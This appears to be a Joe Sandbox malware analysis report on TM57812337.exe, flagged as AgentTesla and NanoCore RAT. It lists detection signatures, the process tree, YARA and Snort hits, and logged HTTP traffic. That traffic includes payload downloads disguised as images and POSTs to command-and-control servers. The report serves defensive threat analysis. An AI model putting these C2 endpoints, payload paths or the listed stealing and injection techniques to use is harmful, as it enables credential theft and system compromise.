Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TM57812337.exe

Overview

General Information

Sample Name:TM57812337.exe
Analysis ID:635102
MD5:de791f645b2235dce3572c7c5961e17b
SHA1:6568e7698ec8a060e0ed98cf7c11de815867d195
SHA256:c6523795348cbf7e88f40cf12cf9ab092242e54fdc972e6ef4591bb3b5497275
Tags:agentteslaexeNanoCore
Infos:

Detection

Nanocore, AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Sigma detected: NanoCore
Detected Nanocore Rat
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Yara detected Nanocore RAT
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Creates multiple autostart registry keys
Injects files into Windows application
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Machine Learning detection for sample
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Yara detected Generic Downloader
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Drops PE files
Uses a known web browser user agent for HTTP communication
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • TM57812337.exe (PID: 6460 cmdline: "C:\Users\user\Desktop\TM57812337.exe" MD5: DE791F645B2235DCE3572C7C5961E17B)
    • cmd.exe (PID: 6956 cmdline: "C:\Windows\System32\cmd.exe" /c timeout 10 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • conhost.exe (PID: 3148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 7000 cmdline: timeout 10 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • Qqsucntzxgqwkiqkvrafiufflip.exe (PID: 6528 cmdline: "C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exe" MD5: 9E72E89826413EA6BA69E1F3907E9901)
      • cmd.exe (PID: 6764 cmdline: "C:\Windows\System32\cmd.exe" /c timeout 10 MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • timeout.exe (PID: 6880 cmdline: timeout 10 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
      • InstallUtil.exe (PID: 6288 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: EFEC8C379D165E3F33B536739AEE26A3)
    • InstallUtil.exe (PID: 3700 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: EFEC8C379D165E3F33B536739AEE26A3)
  • Qjarsxlh.exe (PID: 3216 cmdline: "C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exe" MD5: DE791F645B2235DCE3572C7C5961E17B)
    • cmd.exe (PID: 4708 cmdline: "C:\Windows\System32\cmd.exe" /c timeout 10 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 2600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 5884 cmdline: timeout 10 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • InstallUtil.exe (PID: 6404 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: EFEC8C379D165E3F33B536739AEE26A3)
  • Qjarsxlh.exe (PID: 1300 cmdline: "C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exe" MD5: DE791F645B2235DCE3572C7C5961E17B)
    • cmd.exe (PID: 988 cmdline: "C:\Windows\System32\cmd.exe" /c timeout 10 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 3636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 316 cmdline: timeout 10 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • InstallUtil.exe (PID: 6080 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: EFEC8C379D165E3F33B536739AEE26A3)
  • excel.exe (PID: 6964 cmdline: "C:\Users\user\AppData\Roaming\excel\excel.exe" MD5: EFEC8C379D165E3F33B536739AEE26A3)
  • excel.exe (PID: 620 cmdline: "C:\Users\user\AppData\Roaming\excel\excel.exe" MD5: EFEC8C379D165E3F33B536739AEE26A3)
    • conhost.exe (PID: 5680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • Qylfpmj.exe (PID: 6408 cmdline: "C:\Users\user\AppData\Roaming\Njueisg\Qylfpmj.exe" MD5: 9E72E89826413EA6BA69E1F3907E9901)
  • Qylfpmj.exe (PID: 4980 cmdline: "C:\Users\user\AppData\Roaming\Njueisg\Qylfpmj.exe" MD5: 9E72E89826413EA6BA69E1F3907E9901)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
0000000C.00000002.476919142.0000000005CD0000.00000004.08000000.00040000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_B64_ArtifactsDetects executables embedding bas64-encoded APIs, command lines, registry keys, etc.ditekSHen
  • 0xafc8:$s3: QW1zaVNjYW5CdWZmZXI
  • 0x67900:$s4: VmlydHVhbFByb3RlY3Q
00000010.00000002.507868874.0000000002B34000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000010.00000002.507868874.0000000002B34000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      0000000E.00000000.357836430.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        0000000E.00000000.357836430.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          Click to see the 99 entries
          SourceRuleDescriptionAuthorStrings
          14.0.InstallUtil.exe.400000.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            14.0.InstallUtil.exe.400000.1.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
              14.0.InstallUtil.exe.400000.1.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
              • 0x32b4c:$s10: logins
              • 0x325b3:$s11: credential
              • 0x2eb9d:$g1: get_Clipboard
              • 0x2ebab:$g2: get_Keyboard
              • 0x2ebb8:$g3: get_Password
              • 0x2fea4:$g4: get_CtrlKeyDown
              • 0x2feb4:$g5: get_ShiftKeyDown
              • 0x2fec5:$g6: get_AltKeyDown
              15.3.Qjarsxlh.exe.4548ea0.5.unpackINDICATOR_SUSPICIOUS_EXE_B64_ArtifactsDetects executables embedding bas64-encoded APIs, command lines, registry keys, etc.ditekSHen
              • 0x91e4:$s3: QW1zaVNjYW5CdWZmZXI
              • 0x56f51:$s4: VmlydHVhbFByb3RlY3Q
              14.2.InstallUtil.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                Click to see the 176 entries

                AV Detection

                barindex
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, ProcessId: 6288, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

                E-Banking Fraud

                barindex
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, ProcessId: 6288, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

                Stealing of Sensitive Information

                barindex
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, ProcessId: 6288, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

                Remote Access Functionality

                barindex
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, ProcessId: 6288, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
                Timestamp:3.124.188.36192.168.2.380497612848901 05/27/22-13:24:10.756098
                SID:2848901
                Source Port:80
                Destination Port:49761
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:3.124.188.36192.168.2.380497622848901 05/27/22-13:24:20.545192
                SID:2848901
                Source Port:80
                Destination Port:49762
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:3.124.188.36192.168.2.380497662848901 05/27/22-13:25:07.485286
                SID:2848901
                Source Port:80
                Destination Port:49766
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:3.124.188.36192.168.2.380497672848901 05/27/22-13:25:16.920685
                SID:2848901
                Source Port:80
                Destination Port:49767
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.345.133.1.4149768802034579 05/27/22-13:25:27.451658
                SID:2034579
                Source Port:49768
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:3.124.188.36192.168.2.380497182848901 05/27/22-13:23:20.279494
                SID:2848901
                Source Port:80
                Destination Port:49718
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:3.124.188.36192.168.2.380497532848901 05/27/22-13:24:02.781091
                SID:2848901
                Source Port:80
                Destination Port:49753
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.374.201.28.111497761412816766 05/27/22-13:25:39.268141
                SID:2816766
                Source Port:49776
                Destination Port:141
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.345.133.1.4149763802034579 05/27/22-13:24:46.794494
                SID:2034579
                Source Port:49763
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: TM57812337.exeVirustotal: Detection: 39%Perma Link
                Source: TM57812337.exeReversingLabs: Detection: 26%
                Source: http://45.133.1.41Avira URL Cloud: Label: malware
                Source: http://45.133.1.41/jah/inc/9f3d37faadd0a5.php127.0.0.1POSTAvira URL Cloud: Label: malware
                Source: http://45.133.1.41/jah/inc/9f3d37faadd0a5.phpAvira URL Cloud: Label: malware
                Source: http://45.133.1.41/jah/inc/9f3d37faadd0a5.phpSAvira URL Cloud: Label: malware
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeReversingLabs: Detection: 69%
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeReversingLabs: Detection: 26%
                Source: C:\Users\user\AppData\Roaming\Njueisg\Qylfpmj.exeReversingLabs: Detection: 69%
                Source: Yara matchFile source: 32.2.InstallUtil.exe.3fb455d.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3f05380.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 32.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 32.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3eb5360.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3f05380.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 32.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 32.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 32.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3eb5360.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 32.2.InstallUtil.exe.3faff34.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3e8d340.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 32.2.InstallUtil.exe.3fab0fe.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 32.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 32.2.InstallUtil.exe.3faff34.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.Qqsucntzxgqwkiqkvrafiufflip.exe.3e8d340.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000020.00000000.473733509.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000002.490004111.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000000.472431522.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000002.488350765.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000000.472817757.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000000.473252440.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.476158261.0000000003F05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000002.490307943.0000000003F69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.476008629.0000000003E66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.475883360.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Qqsucntzxgqwkiqkvrafiufflip.exe PID: 6528, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6288, type: MEMORYSTR
                Source: TM57812337.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\Njueisg\Qylfpmj.exeJoe Sandbox ML: detected
                Source: 33.0.InstallUtil.exe.400000.1.unpackAvira: Label: TR/Spy.Gen8
                Source: 33.0.InstallUtil.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                Source: 14.2.InstallUtil.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                Source: 14.0.InstallUtil.exe.400000.1.unpackAvira: Label: TR/Spy.Gen8
                Source: 33.0.InstallUtil.exe.400000.2.unpackAvira: Label: TR/Spy.Gen8
                Source: 32.0.InstallUtil.exe.400000.3.unpackAvira: Label: TR/Dropper.MSIL.Gen7
                Source: 32.0.InstallUtil.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
                Source: 32.0.InstallUtil.exe.400000.2.unpackAvira: Label: TR/Dropper.MSIL.Gen7
                Source: 32.0.InstallUtil.exe.400000.1.unpackAvira: Label: TR/Dropper.MSIL.Gen7
                Source: 32.0.InstallUtil.exe.400000.4.unpackAvira: Label: TR/Dropper.MSIL.Gen7
                Source: 33.0.InstallUtil.exe.400000.4.unpackAvira: Label: TR/Spy.Gen8
                Source: 32.2.InstallUtil.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
                Source: 33.2.InstallUtil.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                Source: 14.0.InstallUtil.exe.400000.4.unpackAvira: Label: TR/Spy.Gen8
                Source: 14.0.InstallUtil.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                Source: 14.0.InstallUtil.exe.400000.3.unpackAvira: Label: TR/Spy.Gen8
                Source: 33.0.InstallUtil.exe.400000.3.unpackAvira: Label: TR/Spy.Gen8
                Source: 14.0.InstallUtil.exe.400000.2.unpackAvira: Label: TR/Spy.Gen8
                Source: TM57812337.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                Source: TM57812337.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                Source: Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: excel.exe, 00000014.00000002.437038810.0000000000BE2000.00000002.00000001.01000000.0000000A.sdmp, excel.exe, 0000001D.00000002.456120032.0000000000F72000.00000002.00000001.01000000.0000000A.sdmp
                Source: Binary string: protobuf-net.pdbSHA256 source: TM57812337.exe, 00000000.00000003.306551945.0000000003768000.00000004.00000800.00020000.00000000.sdmp, TM57812337.exe, 00000000.00000002.360171789.0000000002626000.00000004.00000800.00020000.00000000.sdmp, TM57812337.exe, 00000000.00000002.360648137.0000000005390000.00000004.08000000.00040000.00000000.sdmp, TM57812337.exe, 00000000.00000003.307114547.000000000383B000.00000004.00000800.00020000.00000000.sdmp, Qqsucntzxgqwkiqkvrafiufflip.exe, 0000000C.00000002.475823039.0000000002E5E000.00000004.00000800.00020000.00000000.sdmp, Qqsucntzxgqwkiqkvrafiufflip.exe, 0000000C.00000003.469133000.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, Qqsucntzxgqwkiqkvrafiufflip.exe, 0000000C.00000002.477264623.0000000005DB0000.00000004.08000000.00040000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000003.428208738.0000000004548000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000003.429886945.000000000461B000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000002.489936529.0000000003406000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000002.491299133.0000000006290000.00000004.08000000.00040000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000002.507900582.0000000002B76000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000003.440435154.0000000003CB8000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000003.441550036.0000000003D8B000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000002.508571401.0000000005AC0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: protobuf-net.pdb source: TM57812337.exe, 00000000.00000003.306551945.0000000003768000.00000004.00000800.00020000.00000000.sdmp, TM57812337.exe, 00000000.00000002.360171789.0000000002626000.00000004.00000800.00020000.00000000.sdmp, TM57812337.exe, 00000000.00000002.360648137.0000000005390000.00000004.08000000.00040000.00000000.sdmp, TM57812337.exe, 00000000.00000003.307114547.000000000383B000.00000004.00000800.00020000.00000000.sdmp, Qqsucntzxgqwkiqkvrafiufflip.exe, 0000000C.00000002.475823039.0000000002E5E000.00000004.00000800.00020000.00000000.sdmp, Qqsucntzxgqwkiqkvrafiufflip.exe, 0000000C.00000003.469133000.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, Qqsucntzxgqwkiqkvrafiufflip.exe, 0000000C.00000002.477264623.0000000005DB0000.00000004.08000000.00040000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000003.428208738.0000000004548000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000003.429886945.000000000461B000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000002.489936529.0000000003406000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 0000000F.00000002.491299133.0000000006290000.00000004.08000000.00040000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000002.507900582.0000000002B76000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000003.440435154.0000000003CB8000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000003.441550036.0000000003D8B000.00000004.00000800.00020000.00000000.sdmp, Qjarsxlh.exe, 00000010.00000002.508571401.0000000005AC0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: InstallUtil.pdb source: excel.exe, excel.exe, 0000001D.00000002.456120032.0000000000F72000.00000002.00000001.01000000.0000000A.sdmp, InstallUtil.exe, 00000021.00000002.535075239.0000000006380000.00000004.00000800.00020000.00000000.sdmp

                Software Vulnerabilities

                barindex
                Source: C:\Users\user\AppData\Roaming\excel\excel.exeProcess created: C:\Windows\System32\conhost.exe
                Source: C:\Users\user\Desktop\TM57812337.exeCode function: 4x nop then jmp 0540BE71h
                Source: C:\Users\user\Desktop\TM57812337.exeCode function: 4x nop then jmp 0540BE71h
                Source: C:\Users\user\Desktop\TM57812337.exeCode function: 4x nop then mov dword ptr [ebp-20h], 7FFFFFFFh
                Source: C:\Users\user\Desktop\TM57812337.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]
                Source: C:\Users\user\Desktop\TM57812337.exeCode function: 4x nop then mov dword ptr [ebp-20h], 7FFFFFFFh
                Source: C:\Users\user\Desktop\TM57812337.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeCode function: 4x nop then jmp 05E2B689h
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeCode function: 4x nop then mov dword ptr [ebp-20h], 7FFFFFFFh
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]
                Source: C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exeCode function: 4x nop then mov dword ptr [ebp-20h], 7FFFFFFFh
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeCode function: 4x nop then jmp 056CBE71h
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeCode function: 4x nop then mov dword ptr [ebp-20h], 7FFFFFFFh
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeCode function: 4x nop then mov dword ptr [ebp-20h], 7FFFFFFFh
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeCode function: 4x nop then jmp 051DBE71h
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeCode function: 4x nop then jmp 051DBE71h
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeCode function: 4x nop then mov dword ptr [ebp-20h], 7FFFFFFFh
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeCode function: 4x nop then mov dword ptr [ebp-20h], 7FFFFFFFh
                Source: C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]
                Source: excel.exeMemory has grown: Private usage: 0MB later: 7MB

                Networking

                barindex
                Source: TrafficSnort IDS: 2848901 ETPRO TROJAN Observed Reversed EXE String Inbound (This Program...) 3.124.188.36:80 -> 192.168.2.3:49718
                Source: TrafficSnort IDS: 2848901 ETPRO TROJAN Observed Reversed EXE String Inbound (This Program...) 3.124.188.36:80 -> 192.168.2.3:49753
                Source: TrafficSnort IDS: 2848901 ETPRO TROJAN Observed Reversed EXE String Inbound (This Program...) 3.124.188.36:80 -> 192.168.2.3:49761
                Source: TrafficSnort IDS: 2848901 ETPRO TROJAN Observed Reversed EXE String Inbound (This Program...) 3.124.188.36:80 -> 192.168.2.3:49762
                Source: TrafficSnort IDS: 2034579 ET TROJAN AgentTesla Communicating with CnC Server 192.168.2.3:49763 -> 45.133.1.41:80
                Source: TrafficSnort IDS: 2848901 ETPRO TROJAN Observed Reversed EXE String Inbound (This Program...) 3.124.188.36:80 -> 192.168.2.3:49766
                Source: TrafficSnort IDS: 2848901 ETPRO TROJAN Observed Reversed EXE String Inbound (This Program...) 3.124.188.36:80 -> 192.168.2.3:49767
                Source: TrafficSnort IDS: 2034579 ET TROJAN AgentTesla Communicating with CnC Server 192.168.2.3:49768 -> 45.133.1.41:80
                Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.3:49776 -> 74.201.28.111:141
                Source: Yara matchFile source: 15.3.Qjarsxlh.exe.4548ea0.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.3.Qjarsxlh.exe.3cb8ea0.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.3.Qqsucntzxgqwkiqkvrafiufflip.exe.3fb0b70.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.TM57812337.exe.3768ea0.3.raw.unpack, type: UNPACKEDPE
                Source: global trafficHTTP traffic detected: GET /bay/loader/uploads/TM57812337_Nbfpwrzt.bmp HTTP/1.1Host: 3.124.188.36Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bay/loader/uploads/flip_Jozgxzue.jpg HTTP/1.1Host: 3.124.188.36Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bay/loader/uploads/flip_Jozgxzue.jpg HTTP/1.1Host: 3.124.188.36Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bay/loader/uploads/TM57812337_Nbfpwrzt.bmp HTTP/1.1Host: 3.124.188.36Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bay/loader/uploads/TM57812337_Nbfpwrzt.bmp HTTP/1.1Host: 3.124.188.36Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bay/loader/uploads/flip_Jozgxzue.jpg HTTP/1.1Host: 3.124.188.36Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bay/loader/uploads/flip_Jozgxzue.jpg HTTP/1.1Host: 3.124.188.36Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /jah/inc/9f3d37faadd0a5.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0Content-Type: application/x-www-form-urlencodedHost: 45.133.1.41Content-Length: 580Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /jah/inc/9f3d37faadd0a5.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0Content-Type: application/x-www-form-urlencodedHost: 45.133.1.41Content-Length: 580Expect: 100-continueConnection: Keep-Alive
